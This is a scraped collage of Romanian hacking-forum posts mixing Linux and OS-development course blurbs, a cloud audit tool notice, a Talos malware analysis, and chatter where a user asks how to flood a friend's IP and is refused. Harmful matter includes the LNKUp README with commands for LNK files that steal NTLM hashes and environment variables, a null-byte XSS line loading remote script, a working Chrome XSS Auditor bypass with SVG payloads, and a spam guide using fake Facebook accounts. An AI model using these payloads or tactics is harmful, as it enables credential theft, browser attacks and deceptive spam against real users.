Leaderboard

"Build Your Own Linux (From Scratch)" walks users through building a basic Linux distribution. Presented by Linux Academy & Cloud Assessments. Access the main Linux Academy website to view related course videos and other content, and the Cloud Assessments website for free cloud training powered by AI. Section 1 Our Goal WHAT WE ARE BUILDING This course walks through the creation of a 64-bit system based on the Linux kernel. Our goal is to produce a small, sleek system well-suited for hosting containers or being employed as a virtual machine. Because we don't need every piece of functionality under the sun, we're not going to include every piece of software you might find in a typical distro. This distribution is intended to be minimal. Here is what our end-result will look like: 64-bit Linux 4.8 Kernel with GCC 6.2 and glibc 2.24 A system compatible with both EFI and BIOS hardware Bootable with GRUB2 A VFAT formatted partition for GRUB/UEFI A boot partition A root partition WHAT WE ARE LEARNING This course provides step-by-step instructions in an effort to build the Linux kernel, the GNU C Standard Library implementation, GCC, and user-land binaries from source. The tasks are presented in linear order, and must be followed sequentially, as later tasks have dependencies on early tasks. Do not skip around. Following this guide as intended will, in turn, enlighten you to many of the "hows" and "whys" of Linux, and assist in your ability to do tasks such as: Troubleshooting issues with the kernel Troubleshooting issues with user-land software Understanding the rationale behind various security systems and measures Performance tuning the kernel Performance tuning user-land binaries Building or "rolling" your own distribution Building user-land binaries from source Required Skills and Knowledge We make extensive use of VirtualBox in this course. Working knowledge of VirtualBox and a solid foundation in Linux and Linux troubleshooting are essential. If you're not as familiar with VirtualBox as you would like, take a look at the "How to Install CentOS 7 with VirtualBox" lesson in the "Linux Essentials Certification" course. That course, as well, provides the foundational knowledge required for this course. Standards As we progress through this course, we will adhere to the FHS (Filesystem Hierarchy Standard) specification, version 3.0. We will adhere (mostly) to the LSB (Linux Standard Base) specification, version 5.0. See the pertinent sections in this guide for more information on these two topics. Articol complet: http://www.buildyourownlinux.com/

Parca luase ban Aerosol

Salut, incearca sa intelegi mai intai asta: https://ro.wikipedia.org/wiki/Hypertext_Transfer_Protocol Apoi incearca sa intelegi logica jocului. Ce e diferit, ce contine acel link, ce s-ar putea modifica. Daca vrei sa automatizezi click-ul pe link-uri, asta se poate, dar trebuie putina programare. PS: Trebuie sa iei in considerare posibilitatea ca orice ai face poate sa nu functioneze sa trisezi.

Salut, din pacate nu te poti numi hacker, cel putin din considerentele mele asupra acelui cuvant. Legat de acel "IP flood", de ce ai vrea sa faci asta? Nu o sa se rezolve nimic, iar la vitezele de Internet din ziua de azi, nu e de ajuns un singur calculator pentru asa ceva. Ti-ar trebui cateva mii, cel putin. (depinde si de tinta)

G-Scout: OSS tool to assess the security of Google Cloud Platform (GCP) environment configurations " G-Scout is a tool to help assess the security of Google Cloud Platform (GCP) environment configurations. By leveraging the Google Cloud API, G-Scout automatically gathers a variety of configuration data and analyzes this data to determine security risks. It produces HTML output, which allows for convenient browsing of results. The audited data relates to: IAM roles Compute engine instances Storage buckets Firewall rules SQL and noSQL databases Service account keys G-Scout also allows users to create and customize rulesets simply by creating Python functions. " Source: https://www.nccgroup.trust/us/about-us/newsroom-and-events/blog/2017/august/introducing-g-scout/

LNKUp LNK Data exfiltration payload generator This tool will allow you to generate LNK payloads. Upon rendering or being run, they will exfiltrate data. Info I am not responsible for any actions you take with this tool! You can contact me with any questions by opening an issue, or via my Twitter, @Plazmaz. Known gotchas This tool will not work on OSX or Linux machines. It is specifically designed to target windows. There may be issues with icon caching in some situations. If your payload doesn't execute after the first time, try regenerating it. You will need to run a responder or metasploit module server to capture NTLM hashes. To capture environment variables, you'll need to run a webserver like apache, nginx, or even just this Installation Install requirements using pip install -r requirements.txt Usage Payload types: NTLM Steals the user's NTLM hash when rendered. Needs listener server such as this metasploit module More on NTLM hashes leaking: https://dylankatz.com/NTLM-Hashes-Microsoft's-Ancient-Design-Flaw/ Example usage: lnkup.py --host localhost --type ntlm --output out.lnk Environment Steals the user's environment variables. Examples: %PATH%, %USERNAME%, etc Requires variables to be set using --vars Example usage: lnkup.py --host localhost --type environment --vars PATH USERNAME JAVA_HOME --output out.lnk Extra: Use --execute to specify a command to run when the shortcut is double clicked Example: lnkup.py --host localhost --type ntlm --output out.lnk --execute "shutdown /s" Sursa: https://github.com/Plazmaz/LNKUp

Metoda free: webhost si subdomeniu (puteti folosi domeniu daca aveti) de la easyxsites, pentru a converti traficul folosim plugrush si imagetwist. Metode de trafic: A) 000webhost + wordpress + wprobot + nextscripts configurat sa posteze pe vbulletin cate o poza cu href spre site-ul tau + poti folosi si tumblr si alte servicii (nu uita sa pui si hashtag-uri pentru alte servicii) Spam pe chat-ul de la imagefap (direct cu site-ul vostru sau urcati imagini cu watermark si le puneti pe chaturile lor), pentru mailuri folositi yopmail.com. C) Facebook fake account cu pizda buna, intrati pe grupuri pe facebook si pune-ti poze cu add me, strangeti multi prieteni / followeri si transformati cont-ul in pagina. D) Mai incercati metodele de mai sus. E) Cautati pe google "milf tumblr.com" (sau orice alt keyword) si faceti o lista cu site-urile gasite iar la sfarsit adaugati /rss (ex: muie.tumblr.com/rss) + faceti blog pe tumblr e.x: "milf next door" (fiti cat mai unici). Pasul urmator, cont pe https://ifttt.com/ si facem recipiente cu rss + tumblr si adaugam aici lista de rss-uri facute + punem hashtaguri care au acceasi legatura cu nisa, iar la descriere, desigur link la site-ul nostru. Links: https://www.plugrush.com/?ref=20013 (ref) easyXsites - Your Free Adult Host (non ref) ImageTwist - Free Image Hosting, Photo sharing & Earn Money (non ref) https://www.plugrush.com (non ref) Simplu si scurt, cautati pe google alte site-uri porn sa vedeti cum isi promoveaza alte persoane site-ul lor si faceti si voi acceasi chestie. Link-uri care te pot ajuta: http://www.blackhatworld.com/blackhat-seo/making-money/747458-methods-getting-targetted-visitors-your-adult-cpa-site-traffic-sources.html http://www.blackhatworld.com/blackhat-seo/making-money/801786-method-my-webcam-method-making-600-month.html

%00%00%00%00%00%00%00<script%20src=http://xss.rocks/xss.js ></script> Sursa: https://twitter.com/0rbz_/status/896896095862669312

https://web.archive.org/web/20161003111415/http://www.pcbsd.ru/w0rm/

https://www.evomag.ro/Componente-PC-Procesoare/Intel-Procesor-Intel-Core-i5-6600K-LGA-1151-6MB-95W-BOX-1262657.html i5 6600k - 999 Lei

Am adaugat suport pentru x64: https://github.com/NytroRST/NetRipper Cine ar putea sa teseze daca e totul OK?

http://www.gazetavalceana.ro/2017/08/17/cine-este-hackerul-din-valcea-care-a-spart-site-ul-edu-ro-isi-spune-d3v1x-si-invata-la-liceul-din-horezu/ sunt de la mine din zona...pacat de ei ca au fost naivi

google: click automatization

Pe forumul asta inca umbla o umbra de etica. @Sochu Nu vei primi mura-n gura cum sa dai flood amicului tau. Problema e ca tu nu intelegi ce inseamna "flood" sau cum un flood functioneaza. Pentru tine "floodul" e o jucarie ca sa te dai smecher. Cand spui: "vreau sa invat" te referi la: "vreau sa inteleg cum functioneaza, si pe viitor sa lucrez/construiesc in domeniu" sau "vreau sa invat sa dau flood la dusmani sa moara de ciuda"? Consider ca la 12 ani nu esti suficient de matur sa intelegi diferentele dintre bine/rau, constructiv/destructiv. Daca informatica si matematica/fizica te atrag, te sfatuiesc sa te concentrezi pe scoala. Incearca sa repari calculatoare, instaleaza linux, instaleaza masini viirtuale, fa-ti website etc. Hackingul si spartul isi are vremea lui, dupa ce inveti bine cum functioneaza lumea IT.

Ai venit cautand informatii despre "cum sa dai flood", situatie care cere putin trolling nevinovat, nu o lua personal. Majoritatea puberilor care trec pe-aici (si nu stau mult) vin tot cu prostii de genul ajutor la spart faisbucul lui X, ajutor la spart site-ul Y + sob story, si alte aiureli de genul. Daca vrei sa inveti, asa cum spui, atunci incearca sa afli ce presupune un astfel de atac. Sau mai bine, si mai productiv, incearca sa afli cum functioneaza o retea. Apoi, dupa ce stii cum functioneaza o retea, chiar si la un nivel rudimentar, poti sa incepi sa te uit la metode de atac deja existente care folosesc sau abuzeaza felul in functioneaza reteaua. Cam aici ar trebui sa-ti dai seama de ce raspunsul lui Nytro este cel mai pertinent la intrebarea ta.

Da boss. Da add la vreau.sa.fiu.pirat@anonimouswanna.be Ma înveți sa folosesc torrent te rog?

Operating Systems: From 0 to 1 This book helps you gain the foundational knowledge required to write an operating system from scratch. Hence the title, 0 to 1. After completing this book, at the very least you will learn: How to write an operating system from scratch by reading hardware datasheets. In the real world, it works like that. You won’t be able to consult Google for a quick answer. A big picture of how each layer of a computer is related to the other, from hardware to software. Write code independently. It’s pointless to copy and paste code. Real learning happens when you solve problems on your own. Some examples are given to kick start, but most problems are yours to conquer. However, the solutions are available online for you to examine after giving it a good try. Linux as a development environment and how to use common tools for low-level programming. x86 assembly in-depth. How a program is structured so that an operating system can run. How to debug a program running directly on hardware with gdb and QEMU. Linking and loading on bare metal x86_64, with pure C. No standard library. No runtime overhead. Download the book The pedagogy of the book You give a poor man a fish and you feed him for a day. You teach him to fish and you give him an occupation that will feed him for a lifetime. This has been the guiding principle of the book when I was writing it. The book does not try to teach you everything, but enough to enable you to learn by yourself. The book itself, at this point, is quite “complete”: once you master part 1 and part 2 (which consist of 8 chapters), you can drop the book and learn by yourself. At this point, smart readers should be able to continue on their own. For example, they can continue their journeys on OSDev wiki; in fact, after you study everything in part 1 and part 2, you only meet the minimum requirement by OSDev Wiki (well, not quite, the book actually goes deeper for the suggested topics). Or, if you consider developing an OS for fun is impractical, you can continue with a Linux-specific book, such as this free book Linux Insides, or other popular Linux kernel books. The book tries hard to provide you a strong foundation, and that’s why part 1 and part 2 were released first. The book teaches you core concepts, such as x86 Assembly, ELF, linking and debugging on bare metal, etc., but more importantly, where such information come from. For example, instead of just teaching x86 Assembly, it also teaches how to use reference manuals from Intel. Learning to read the official manuals is important because only the hardware manufacturers themselves understand how their hardware work. If you only learn from the secondary resources because it is easier, you will never gain a complete understanding of the hardware you are programming for. Have you ever read a book on Assembly, and wondered where all the information came from? How does the author know everything he says is correct? And how one seems to magically know so much about hardware programming? This book gives pointers to such questions. As an example, you should skim through chapter 4, “x86 Assembly and C”, to see how it makes use of the Intel manual, Volume 2. And in the process, it guides you how to use the official manuals. Part 3 is planned as a series of specifications that a reader will implement to complete each operating system component. It does not contain code aside from a few examples. Part 3 is just there to shorten the reader’s time when reading the official manuals by giving hints where to read, explaining difficult concepts and how to use the manuals to debug. In short, the implementation is up to the reader to work on his or her own; the chapters are just like university assignments. Prerequisites Know some circuit concepts: Basic Concepts of Electricity: atoms, electrons, protons, neutrons, current flow. Ohm’s law However, if you know absolutely nothing about electricity, you can quickly learn it here:http://www.allaboutcircuits.com/textbook/, by reading chapter 1 and chapter 2. C programming. In particular: Variable and function declarations/definitions While and for loops Pointers and function pointers Fundamental algorithms and data structures in C Linux basics: Know how to navigate directory with the command line Know how to invoke a command with options Know how to pipe output to another program Touch typing. Since we are going to use Linux, touch typing helps. I know typing speed does not relate to problem-solving, but at least your typing speed should be fast enough not to let it get it the way and degrade the learning experience. In general, I assume that the reader has basic C programming knowledge, and can use an IDE to build and run a program. Status: Part 1 Chapter 1: Complete Chapter 2: Complete Chapter 3: Almost. Currently, the book relies on the Intel Manual for fully explaining x86 execution environment. Chapter 4: Complete Chapter 5: Complete Chapter 6: Complete Part 2 Chapter 7: Complete Chapter 8: Complete Part 3 Chapter 9: Incomplete Chapter 10: Incomplete Chapter 11: Incomplete Chapter 12: Incomplete Chapter 13: Incomplete … and future chapters not included yet … In the future, I hope to expand part 3 to cover more than the first 2 parts. But for the time being, I will try to finish the above chapters first. Sample OS This repository is the sample OS of the book that is intended as a reference material for part 3. It covers 10 chapters of the “System Programming Guide” (Intel Manual Volume 3), along with a simple keyboard and video driver for input and output. However, at the moment, only the following features are implemented: Protected mode. Creating and managing processes with TSS (Task State Structure). Interrupts LAPIC. Paging and I/O are not yet implemented. I will try to implement it as the book progresses. Contributing If you find any grammatical issues, please report it using Github Issues. Or, if some sentence or paragraph is difficult to understand, feel free to open an issue with the following title format: [page number][type] Descriptive Title. For example: [pg.9][grammar] Incorrect verb usage. type can be one of the following: Typo: indicates typing mistake. Grammar: indicates incorrect grammar usage. Style: indicates a style improvement. Content: indicates problems with the content. Even better, you can make a pull request with the provided book source. The main content of the book is in the file “Operating Systems: From 0 to 1.lyx”. You can edit the .txt file, then I will integrate the changes manually. It is a workaround for now since Lyx can cause a huge diff which makes it impossible to review changes. The book is in development, so please bear with me if the English irritates you. I really appreciate it. Finally, if you like the project and if it is possible, please donate to help this project and keep it going. Got questions? If you have any question related to the material or the development of the book, feel free to open a Github issue. Sursa: https://tuhdo.github.io/os01/

Acum am terminat si eu de vazut episodul. Se poate rezuma in 3 cuvinte: "holy fucking shit!"

Monday, August 14, 2017 When combining exploits for added effect goes wrong Introduction Since public disclosure in April 2017, CVE-2017-0199 has been frequently used within malicious Office documents. The vulnerability allows attackers to include Ole2Link objects within RTF documents to launch remote code when HTA applications are opened and parsed by Microsoft Word. In this recent campaign, attackers combined CVE-2017-0199 exploitation with an earlier exploit, CVE-2012-0158, possibly in an attempt to evade user prompts by Word, or to arrive at code execution via a different mechanism. Potentially, this was just a test run in order to test a new concept. In any case, the attackers made mistakes which caused the attack to be a lot less effective than it could have been. Analysis of the payload highlights the potential for the Ole2Link exploit to launch other document types, and also demonstrates a lack of rigorous testing procedures by at least one threat actor. Attackers are obviously trying to find a way around known warning mechanisms alerting users about potential security issues with opened documents. In this blog post we analyse what happens when an attack attempts to combine these two exploits in a single infection chain and fails. Although this attack was unsuccessful it has shown a level of experimentation by attackers seeking to use CVE-2017-0199 as a means to launch additional weaponized file types and avoid user prompts. It may have been an experiment that didn’t quite work out, or it may be indication of future attacks yet to materialise. Standard CVE-2017-0199 exploitation A typical attack exploiting CVE-2017-0199 consists of an email campaign, distributing a malicious RTF document.The vulnerability exists in code that handles Ole2Link embedded objects. Including an Ole2Link in an RTF document allows Word to load other, remote documents within the context of Word. Standard CVE-2017-0199 flow If the remote OLE2Link points to an HTML application file (HTA file type), vulnerable Word and WordPad versions will parse and execute the application even if the user chooses not to allow inclusion of the remote content. A possible sign of exploitation attempt of CVE-2017-0199 is this Word prompt to the user: Word prompt displayed to the user before potential CVE-2017-0199 exploit attempt Modified CVE-2017-0199 flow In the case of the modified exploit flow we analyzed, the attack started with an email message containing a malicious attachment. The email employed the usual social engineering tricks to entice the user to open and read the attached document. Referring to the attachment as a purchase order coming from an unknown "partner" is a very common social engineering trick of spammed malware. Email message launching the modified attack The document attached to the email message is an RTF file including an Ole2Link to a remote document hosted at hxxp://multplelabs [dot] com/ema/order.doc. In this case, the mime content type of the remote document observed in the packet capture of the attack was not the expected application/hta but rather application/msword which was enough to motivate us to dig a little bit deeper in order to find out what the attackers are trying to achieve. The first surprising thing is that the vulnerable version of Word I used for the analysis crashed before it managed to display the prompt commonly seen with CVE-2017-0199 exploitation. Instead of displaying the prompt, Word started to convert the downloaded document and then hung before eventually crashing with a memory access fault. Word crashes without the prompt The crash was caused not by the first exploit stage using CVE-2017-0199 but rather by the second stage using CVE-2012-0158. Here we see the shellcode embedded into a MSComctlLib.ListViewCtrl.2 ActiveX control, which is a telltale sign of CVE-2012-0158. The shellcode starts with a ROP chain followed by the shellcode which starts executing when the vulnerability is triggered. After the ROP chain sets the right permissions for the memory block containing the rest of the shellcode, the first stage of the shellcode is executed. First stage shellcode for CVE-2012-0158 This stage is responsible for the application crash. The attackers did not seem to have a good quality assurance process or perhaps the technical expertise to understand what will happen if they simply included an automatically generated CVE-2012-0158 exploit in combination with CVE-2017-0199. The shellcode starts with resolving several API addresses, which allow the code to traverse all open files by bruteforcing the handle numbers for open files, starting from zero and increasing the handle number by four for every next open file handle. If the handle exists, the shellcode attempts to check the file size using the GetFileSize API that takes the file handle as the parameter. If the file size is within the expected range the shellcode maps it in memory to perform a file type check. Checking the file size and finding file type The shellcode here incorrectly assumes that if the found file is an RTF file then all the required conditions are met and the identified RTF file must contain the next shellcode stage. Once the shellcode assumes the file size and type requirements are satisfied, it starts to read the mapped file looking for the next stage shellcode marker which is, in our test, never found because the original CVE-2017-0199 exploiting file is still present in memory. This file satisfies both of the conditions searched for by the first stage shellcode. Since the CVE-2017-0199 exploiting file is open before the CVE-2012-0158 document, its handle is smaller and it is read first by the shellcode. First stage shellcode looking for the next shellcode stage marker The shellcode searches for the next stage marker 0xfefefefefeffffffff within the wrong document, without correctly handling reads beyond the document length. This eventually causes a memory protection error by reading memory content past the allocated memory blocks. If the attackers would have been just a little bit more technically savvy they would realize this problem and easily fix it to make these two exploits work together successfully without the prompt to load the remote content being displayed to the end-user. One possible fix involves fixing a single byte to make the file size limits a bit stricter to exclude the original CVE-2017-0199 file size. The other way, just slightly more complex, is to correctly handle cases when the next stage marker is not found within the RTF and assume that the targeted Word process already has other RTF documents opened which satisfy the file size condition. Interestingly enough, the shellcode in the document containing the CVE-2012-0158 exploit will be successfully executed if there are no other open RTF files so we analyzed the remainder for the sake of completeness. Second stage shellcode The second stage shellcode is a bit more complex and starts by finding required API functions within ntdll.dll. The API functions are used to launch an instance of svchost.exe in a suspended state, and to overwrite the original entrypoint with the final "download and execute" shellcode stage which eventually launches the executable payload. Finding ntdll.dll APIs to inject the last stage and resume svchost.exe process The last shellcode stage, injected into svchost.exe uses UrlDownloadToFile API to download an executable file from the command and control server into the temporary files folder with the filename name.exe, and calls the ShellExecute function to launch the final payload. Download and execute stage The downloaded executable payload is a packed VB dropper which drops an older Ramnit version, but it also runs Lokibot, based on the observed traffic to the command and control server. Ramnit is a well known self-replicating information stealing bot which also includes a rootkit to hide its presence from the user and security products and is already well documented. Further analysis of this particular piece of malware is outside of the scope of this blog post. Despite being older, the Ramnit family is still a commonly encountered malware family by Talos. It is possible that in this case the attackers intended to launch a Lokibot attack but the sample got infected by the Ramnit file infection component along the way. DNS activity for multplelabs.com The domain hosting the malware and the command and control server was registered in October 2016 and it is likely a compromised site, although it seems to have been used by some other Lokibot campaigns. The DNS activity for the domain shows two distinct spikes, which likely indicate two unsuccessful spam campaigns as there has been no additional activity to show increase in communication from infected systems to the command and control server. The DNS activity confirms our findings which document the reasons for the attack failure. Conclusion CVE-2017-0199 is one of the most commonly used vulnerabilities exploited by malicious documents distributed in spamming campaigns. Previous work indicates that its popularity with attackers overcame the popularity of CVE-2012-0158. In this blog post we analyse what happens when an attack attempts to combine these two exploits in a single infection chain. In the case of this campaign the attackers made a major mistake that prevented the intended download and execution of the Ramnit payload. Attempted combined attack stages One has to wonder why did the attackers use the combination of a newer and an older exploit at all? The combination would not be executed if the targeted system had a patch against either of the exploits. In addition, if the targeted system was vulnerable to CVE-2012-0158 it would be much easier for the attackers to use a single exploit targeting this vulnerability. An assumption we can make is that that the attackers used the combination to avoid Word displaying the prompt which may raise suspicions for the target end user. Another possibility is that they attempted to use this combination in order to avoid behavioral detection systems which may be triggering on the combination of Ole2Link in a word document and a download of an HTA file. This attack was unsuccessful, potentially indicating poor testing or quality control procedures by the attackers. However, this does show a level of experimentation by attackers seeking to use CVE-2017-0199 as a means to launch additional weaponized file types and avoid user prompts. This attack may have been an experiment that didn't quite work out, or it may be indication of future attacks yet to materialise. Coverage Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors. CWS or WSA web scanning prevents access to malicious websites and detects malware used in these attacks. Email Security can block malicious emails sent by threat actors as part of their campaign. Network Security appliances such as NGFW, NGIPS, and Meraki MX with Advanced Security can detect malicious activity associated with this threat. AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products. Umbrella prevents DNS resolution of the domains associated with malicious activity. Stealthwatch detects network scanning activity, network propagation, and connections to CnC infrastructures, correlating this activity to alert administrators. IOCs Documents 5ae2f13707ee38e4675ad1bc016b19875ee32312227103d6f202874d8543fc2e - CVE-2017-0199 6a84e5fd6c9b2c1685efc7ac8d763048913bad2e767b4958e7b40b4488bacf80 - CVE-2012-0158 Executables 351aec22d926b4fb7efc7bafae9d1603962cadf0aed1e35b1ab4aad237723474 f34e5af97ccb3574f7d5343246138daf979bfd1f9c37590e9a41f6420ddb3bb6 43624bf57a9c7ec345d786355bb56ca9f76c226380302855c61277bdc490fdfe d4fbca06989a074133a459c284d79e979293625262a59fbd8b91825dbfbe2a13 URLs hxxp://multplelabs[dot]com/ema/order.doc - CVE-2012-0158 hxxp://multplelabs[dot]com/ema/nextyl.exe - dropper hxxp://multplelabs[dot]com/freem/50/fre.php - Lokibot C2 Posted by Vanja Svajcer at 12:55 PM Sursa: http://blog.talosintelligence.com/2017/08/when-combining-exploits-for-added.html

Chrome XSS Auditor – SVG Bypass August 14, 2017 Brute The Art of XSS Payload Building More than an year ago, in my private twitter account Brutal Secrets, I shared an interesting way to bypass Google’s Chrome anti-XSS filter called XSS Auditor. We will see now in details, from a blackbox perspective, a logical sequence of assumptions and conclusions that leads to our XSS vector responsible for the bypass. We start with a known source of trouble for all XHTML parsers (browsers) out there: Scalable Vector Graphics or SVG. Without getting deeper into the explanation of what SVG can do (check here), all we need to know is that SVG markup is way more complex than simple XML/HTML and full of unexplored resources for an attacker. Starting with a simple <svg> tag we proceed using an empty anchor, the <a> tag that creates an hyperlink. Nested to this anchor we will use a rectangle to create a larger clickable area, ending up with something like this: <svg><a><rect width=100% height=100%> check here We are now looking for a way to interact with the element but we can’t use event handlers due to Auditor’s blocking. So we will try one of the tags used in animations, notably the <animate> one. The <animate> tag takes an attribute (with attributeName) of a parent element (in our case the <rect> one) and manipulates its value, like “width” for instance. It creates the animation effect with the help of its own attributes “from”, “to” and “dur” (duration). <svg><a><rect width=100% height=100%><animate attributeName=width from=0 to=100% dur=2s> check here The interesting conclusion here is that we are in fact changing the original value of “width” attribute, in sequence. But what if we target a different attribute? Let’s take the href of the anchor (<a>) which is not set but is implicit. With some tweak in attributes and a self-closed <rect>, we are ready to go. <svg><a><rect width=100% height=100% /><animate attributeName=href to=//google.com> check here or <svg><a><rect width=100% height=100%><animate attributeName=href from=//google.com to=?> check here By clicking in our rectangle now, we are redirected to Google’s website. So to pop an alert box, we will just try to change it to “javascript:alert(1)”. Not that easy. Even an attempt to fool Auditor using HTML encoding gets blocked. <svg><a><rect width=100% height=100% /><animate attributeName=href to=javas&#99ript:alert(1)> check here We get back to SVG Attribute Reference and find an interesting alternative to “from” and “to”: animation elements can also use a “values” attribute which provides the same set of values for the animation. By simply setting “values” to “javascript:alert(1)” we get blocked again. But, surprisingly, this time we pop an alert using the HTML encoded form, “javas&#99ript:alert(1)”. Strange enough, any other arbitrary attribute with our obfuscated payload will fire a blocking but that one seems “whitelisted”! We change the <rect> for an <image> tag, more suitable to attract a victim’s click. A little addition of text/markup and… Boom! <svg width=12cm height=9cm><a><image href=//brutelogic.com.br/yt.jpg /><animate attributeName=href values=javas&#99ript:alert(1)> check here This bypass was found in version 51, although it might work in several past versions. It currently works on Google Chrome v60, the latest version at the time of this publication. Sursa: https://brutelogic.com.br/blog/chrome-xss-auditor-svg-bypass/

Daca te-ai pus sa taci, taci, ca te-au amutit, te-ai pus pe mancat cacat si nu-ti dai seama, hai ma cu topicu la cos.. mei dreaq la pakistanezii tai. @aelius

Ma gandeam sa fac putin misto de el pentru asta: dar vad in postarile anterioare ca si limba materna il doboara in mod.. napraznic. Tragi-comic e si (asa-zisa)conditia: Daca i-ar scrie cineva un articol, care are un vocabular mai bogat si eventual foloseste ceva epitete mai putin uzuale, cred ca s-ar speria, crezand ca il injura de mama. Trist, la 20 ani sau cat se da ca are.. flacau in toata regula si cu creierul neted Cine o sa va plateasca bre pensiile?

Penibil...

Si ce anume este penibil domnule?

Nytro,vreau sa ii dau flood unui prieten care m-a enervat si vreau o razbunare calumea

Salut,sunt nou in ale "hacking"-ului.Probabil nici nu ma pot numi hacker,stiu doar sa sparg retele de wifi si arhive+piratare de orice fel.Sunt interesat de cum sa dai flood la o adresa IP si am incercat tot felul de tool-uri si in cmd.Partea cu aflarea IP-ului e usoara dar partea cu flood-ul e mai grea.Ma puteti ajuta?